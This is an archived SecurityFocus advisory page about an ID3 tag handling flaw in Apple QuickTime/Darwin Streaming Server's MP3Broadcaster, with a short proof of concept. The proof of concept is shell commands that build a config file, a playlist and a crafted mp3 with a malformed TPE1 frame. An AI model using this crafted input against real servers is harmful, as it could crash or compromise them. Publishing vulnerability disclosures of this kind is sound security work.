Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Apple QuickTime/Darwin Streaming MP3Broadcaster ID3 Tag Handling Vulnerability

The following proof of concept has been provided by Sir Mordred <mordred@s-mail.com>:

First create the sample configuration file:
$ echo -e "\n" > test.conf

Then create a playlist file:
$ echo -e "*PLAY-LIST*\nsong.mp3" > mp3playlist.ply

Create a specially crafted mp3 file:
$ echo -e
"ID3\x03\x00\x00\x00\x00\x0f\x0fTPE1\xff\xaa\xaa\xbb\x00\x00\x00\x00\x00\x00

" > song.mp3







 

Privacy Statement
Copyright 2009, SecurityFocus